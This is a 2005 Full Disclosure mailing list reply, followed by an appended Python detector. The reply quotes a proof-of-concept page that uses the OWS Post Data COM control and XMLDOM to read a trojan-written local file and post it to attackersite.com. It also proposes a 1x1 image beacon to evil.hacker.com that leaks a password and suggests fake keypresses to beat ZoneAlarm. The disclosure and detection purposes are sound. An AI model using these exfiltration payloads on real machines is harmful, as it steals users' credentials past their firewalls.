Full Disclosure mailing list archives
Re: new attack technique? using JavaScript+XML+OWS Post Data
From: Joachim Schipper <j.schipper () math uu nl>
Date: Wed, 21 Dec 2005 17:36:04 +0100
On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> While researching COM related security vulnerabilities I thought of this possible attack technique, not sure if it has been discussed before.
>
> Problem/challenge statement:
> A Trojan has been to be placed in a system running an application firewall like Zone Alarm Pro etc. The Trojan is not allowed to make any outbound connections. The challenge is to send data (key logged passwords etc) back to the attacker.
>
> Solution
> The Trojan can be designed to generate an xml file which will contain the data to be sent out. The attacker will lure the user to visit a website hosted by him. The site can have following HTML code-
>
> <html>
> <body>
> The author is not responsible for any misuse, this PoC is for educational purpose only.
> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp">
> </object>
> <script LANGUAGE=javascript>
> var xmlDoc
> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> xmlDoc.async=false;
> xmlDoc.load("c:\\note.xml");
> xmlObj=xmlDoc.documentElement;
> var a= xmlObj.firstChild.text;
> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> </script>
> </body>
> </html>
>
> Content of note.xml could be -
> <password>secret</password>
>
> The above code (works well on windows XP SP2) essentially calls "OWS Post Data" COM control to post the contents of note.xml (generated by trojan) to attackersite.com
>
> Essentially, the technique is breaking the basic functionality of application firewalls by using OWS Post Data as bridge for sending out the data using Javascript and XML.
>
> flames/spam/abuse etc can be sent to spam () securebox org
> comments can be sent to gaurav () securebox org

I'll just assume you read the list.

I'm not an expert, but I don't recall ever seeing this particular implementation. Then again, there are easier ways to go about this - for instance, how about embedding a <img src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1 height=1> tag into an arbitrary HTML file? It works on any graphical browser without special protection.

Search the archives for some more neat tricks - calling the proper APIs, IE can be used to send out pretty much arbitrary data. [1]

If you're willing to attack ZA specifically (instead of a generic application/-based firewall, of which there are many) just use the Windows API to generate the proper mouse clicks/keypresses.

Joachim

[1] Some would say that, calling the 'proper' APIs, IE can be used to send *in* pretty much arbitrary data too. I'd be inclined to agree.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
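
A defender-side check for the patterns discussed in this message, as an added example that is not part of the original post or thread: it scans an HTML document for the OWS Post Data object (CLSID taken from the quoted PoC), for script that loads a local file through Microsoft.XMLDOM, and for 1x1 images with absolute URLs. The rule names, the `scan` function and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the "OWS Post Data" control, copied from the quoted PoC.
OWS_POST_DATA = "bdeade98-c265-11d0-bced-00a0c90ab50f"
# Script passing a local drive path to an XML DOM load() call.
LOCAL_LOAD = re.compile(r"""\.load\(\s*["'][a-z]:[\\/]""", re.I)

class ExfilPatternScanner(HTMLParser):
    """Collects (rule, detail) findings; rule names are illustrative."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        self.in_script = tag == "script"
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            if clsid == OWS_POST_DATA:
                self.findings.append(("ows-post-data-object", a.get("id", "")))
        elif tag == "img" and (a.get("width"), a.get("height")) == ("1", "1"):
            # 1x1 image with an absolute URL (the callback in the reply).
            # Noisy on its own: ordinary tracking pixels look the same.
            if a.get("src", "").lower().startswith(("http://", "https://")):
                self.findings.append(("1x1-remote-image", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if (self.in_script and "microsoft.xmldom" in data.lower()
                and LOCAL_LOAD.search(data)):
            self.findings.append(("xmldom-local-file-load", ""))

def scan(html):
    scanner = ExfilPatternScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page (placeholder host under .invalid).
SAMPLE = r'''<html><body>
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"></object>
<script>var d = new ActiveXObject("Microsoft.XMLDOM"); d.load("c:\\note.xml");</script>
<img src="http://collector.example.invalid/callback/x" width=1 height=1>
</body></html>'''
```

`scan(SAMPLE)` returns the three findings in document order; the same function can be run over saved proxy or mail-gateway HTML bodies.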